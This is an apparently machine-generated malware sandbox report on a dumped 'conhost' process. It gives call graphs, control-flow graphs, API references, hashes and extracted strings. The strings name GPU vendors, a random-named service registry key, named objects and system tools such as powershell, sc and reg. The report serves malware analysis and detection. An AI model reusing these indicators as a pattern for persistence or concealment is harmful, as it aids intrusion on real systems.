14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 
14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2379 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2379 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 
2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2379 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 
2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2379

                                        Callgraph

                                        • Executed
                                        • Not Executed
                                        • Opacity -> Relevance
                                        • Disassembly available

                                        Control-flow Graph

                                        APIs
                                        • NtFilterToken.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: FilterToken
                                        • String ID:
                                        • API String ID: 762648202-0
                                        • Opcode ID: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
                                        • Instruction ID: a491f1afa2254d8e491352d0748b00eed3e2628b9b22ab978c5d7e1ef0c2ef5b
                                        • Opcode Fuzzy Hash: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
                                        • Instruction Fuzzy Hash: B9F09DB2608B408AEA12DF62F85179A77A1F39C7C0F009919BBC853735DB38C190CB40
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
                                        • String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\hqiuerqd$\BaseNamedObjects\qtltrbgpvurodlwl$\BaseNamedObjects\ycgenmfwsowvjvqbumbspsss$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\LBFXRZGB$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe$\spvpfblnegdb\vzppfnnlsyit.exe
                                        • API String ID: 3506639089-1549105456
                                        • Opcode ID: 90db9a7731720e88522d8d38e5ea1f0388113d8381940714b474d078eb607f7e
                                        • Instruction ID: 5ef5db7b37bb24d68ff8a091b2437ffe53c7127864c5a306bdafc3344707124e
                                        • Opcode Fuzzy Hash: 90db9a7731720e88522d8d38e5ea1f0388113d8381940714b474d078eb607f7e
                                        • Instruction Fuzzy Hash: 6B5329F1924AC198F723CF3AB8557E563A0BB9E3C4F445216FB84676B2EB794285C304

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                        • String ID: 0$X$\BaseNamedObjects\qtltrbgpvurodlwl$`
                                        • API String ID: 780471329-4278700208
                                        • Opcode ID: 33cae6ecf3a4f6a6eaa5e8a2757f9e2d00034ac4714d2994db2ec936214c8a37
                                        • Instruction ID: 1c2136ab02bee67e58e999314ff5cb183a1ed0111dddb6ac6ef716682bc51c79
                                        • Opcode Fuzzy Hash: 33cae6ecf3a4f6a6eaa5e8a2757f9e2d00034ac4714d2994db2ec936214c8a37
                                        • Instruction Fuzzy Hash: CF126BB2618BC081E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                        • String ID:
                                        • API String ID: 2643109117-0
                                        • Opcode ID: 514ed7368dccedeb7f680d4cac02b15deb7491fcf34cc482be2c93d7086a4443
                                        • Instruction ID: ca612bbd05fde3f0107629a88ce93422da10278469a3e5f307c47095f5bd34e7
                                        • Opcode Fuzzy Hash: 514ed7368dccedeb7f680d4cac02b15deb7491fcf34cc482be2c93d7086a4443
                                        • Instruction Fuzzy Hash: C15121F1601A4085FB16EF27F9943EA27A1BB8CBD0F449121FB4E873B2DE3884958700

                                        Control-flow Graph

                                        control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 517 140001c72-140001c79 511->517 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                        APIs
                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                        • API String ID: 2595394609-2123141913
                                        • Opcode ID: 90aa3dd41f88f18f65aa9fd07c815d31b7548e95ef97d9e3e5c050fb7506a186
                                        • Instruction ID: a85250c360aa3c0d0e6a7732d6f275fb29b2c732c254969a5ce6d4d1f731ff7b
                                        • Opcode Fuzzy Hash: 90aa3dd41f88f18f65aa9fd07c815d31b7548e95ef97d9e3e5c050fb7506a186
                                        • Instruction Fuzzy Hash: 3A4132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700

                                        Control-flow Graph

                                        control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                        • String ID:
                                        • API String ID: 3326252324-0
                                        • Opcode ID: ce66377f6fe450d63289045f16939e18676438556ef95a9d754a76f290c0f198
                                        • Instruction ID: 88ee134eb71c78e1866634492c1617bf7048d548754f0bbdfc0a648c6b94092f
                                        • Opcode Fuzzy Hash: ce66377f6fe450d63289045f16939e18676438556ef95a9d754a76f290c0f198
                                        • Instruction Fuzzy Hash: 2D21E3B0305A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB798986C300

                                        Control-flow Graph

                                        control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006bd0 553->557 561 140001f43-140001f45 554->561 562 140001f2f-140001f3f 554->562 555->554 559 140001ee4-140001ee8 555->559 556->548 558 140001ec0 556->558 557->554 566 140001f0c-140001f10 557->566 558->554 563 140001eea-140001ef9 signal 559->563 564 140001f4e-140001f53 559->564 561->548 562->561 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CCG
                                        • API String ID: 0-1584390748
                                        • Opcode ID: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                        • Instruction ID: 32d80918a5fc0d3f209f19ed34055b18f0ef7c89e2b1fcaed64eceb18b648f5f
                                        • Opcode Fuzzy Hash: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                        • Instruction Fuzzy Hash: D22139B1A0161542FA77DA2BB5903FA2192ABCC7E4F258535BF19873F5DF3888C28241

                                        Control-flow Graph

                                        control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 583 140001a20-140001a26 580->583 584 140001956-140001961 581->584 585 14000199e-1400019a6 581->585 582->581 586 14000192b-14000193a 582->586 589 140001b87-140001b98 call 140001d40 583->589 590 140001a2c-140001a37 583->590 587 140001970-14000199c call 140001ba0 584->587 585->572 588 1400019a8-1400019c1 585->588 586->579 587->585 593 1400019df-1400019e7 588->593 590->585 594 140001a3d-140001a5f 590->594 598 1400019e9-140001a0d VirtualProtect 593->598 599 1400019d0-1400019dd 593->599 595 140001a7d-140001a97 594->595 600 140001b74-140001b82 call 140001d40 595->600 601 140001a9d-140001afa 595->601 598->599 599->572 599->593 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->585 612->595 613->609 614->600
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                        • API String ID: 544645111-395989641
                                        • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                        • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                        • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                        • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                        Control-flow Graph

                                        control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: fprintf
                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                        • API String ID: 383729395-3474627141
                                        • Opcode ID: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                        • Instruction ID: c63db515c4fb09d3b511a87353661d5ddb22af0fe9f44d3f7c4a04084b72718c
                                        • Opcode Fuzzy Hash: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                        • Instruction Fuzzy Hash: 40F0F671A04A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C300

                                        Control-flow Graph

                                        control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000038.00000002.3311680685.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                        • Associated: 00000038.00000002.3311643571.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311713444.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311741111.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                        • Associated: 00000038.00000002.3311761488.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_56_2_140000000_conhost.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                        • String ID:
                                        • API String ID: 682475483-0
                                        • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                        • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                        • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                        • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300